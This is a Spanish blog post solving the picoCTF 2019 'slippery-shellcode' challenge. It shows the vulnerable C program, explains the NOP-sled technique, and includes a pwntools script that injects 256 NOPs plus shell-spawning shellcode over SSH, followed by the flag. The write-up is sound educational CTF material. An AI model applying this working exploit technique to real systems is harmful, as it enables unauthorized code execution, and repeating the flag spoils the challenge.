Binary Exploitation (XXV): Solución Reto picoCTF 2019 "slippery-shellcode"

Al hilo de los dos posts anteriores, en esta entrada profundizo un poco más en la técnica de inyección de 'shellcode' (en inglés, 'shellcode injection') utilizando para ello la solución a uno de los retos de la categoría 'Binary Exploitation' de la plataforma picoCTF 2019.

El desafío en cuestión, que lleva el título "slippery-shellcode", presenta en mi opinión un nivel de dificultad medio (★★★☆☆).

- slippery-shellcode - Points: 200:

Su enunciado dice lo siguiente: 'This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0 on the shell server. Source'.

Se proporcionan dos archivos: un ejecutable (vuln) y un fichero con el código fuente (vuln.c).

Solución: Este reto es muy similar al del post anterior,  con la única diferencia de que no sé exactamente la dirección dentro del 'buffer' donde va a bifurcar el programa, por lo que desconozco dónde inyectar el 'shellcode' que al ejecutarse abrirá la 'shell'.

En el reto del post anterior el programa bifurcaba al inicio del 'buffer', por lo que bastaba incluir el 'shellcode' al principio del mismo, mientras que en éste, tal y como se observa en el código fuente (vuln.c), el programa bifurca a una dirección aleatoria desplazada entre 1 y 256 con respecto a la dirección de inicio del 'buffer':

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/types.h>

#define BUFSIZE 512

#define FLAGSIZE 128

void vuln(char *buf){

  gets(buf);

  puts(buf);

}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  

  // Set the gid to the effective gid

  // this prevents /bin/sh from dropping the privileges

  gid_t gid = getegid();

  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter your shellcode:");

  vuln(buf);

  puts("Thanks! Executing from a random location now...");

  int offset = (rand() % 256) + 1;

  

  ((void (*)())(buf+offset))();

  puts("Finishing Executing Shellcode. Exiting now...");

  

  return 0;

} 

Para garantizar que el 'shellcode' se ejecute siempre, con independencia de la citada dirección aleatoria del 'buffer' a la que bifurque el programa, utilizo el concepto de tobogán de NOP's (en inglés, 'NOP sled') que introduje en este post, es decir, incluyo justo antes del 'shellcode' a inyectar una sucesión de 256 instrucciones NOP ('No Operation') que no harán nada (cada una de ellas - 0x90 en 'assembler' - ocupa un byte y consume un ciclo máquina -); simplemente  se ejecutará la siguiente instrucción situada de forma consecutiva a la misma hasta que el procesador encuentre el 'shellcode'.

Aunque es perfectamente posible utilizar como 'shellcode' el mismo código máquina como cadena de caracteres que el empleado en el post anterior, en éste creo un pequeño script en python y dejo que 'pwntools' genere el 'exploit' ('NOP sled' + 'shellcode') por mí:

from pwn import *

conn = ssh(host='2019shell1.picoctf.com', user='********', password='********')

conn.set_working_directory(b'/problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0')

pro = conn.process('./vuln')

pro.sendline(asm(shellcraft.nop()) * 256 + asm(shellcraft.sh()))

pro.interactive()

Lo ejecuto:

Y veo que la flag es: picoCTF{sl1pp3ry_sh311c0d3_0fb0e7da}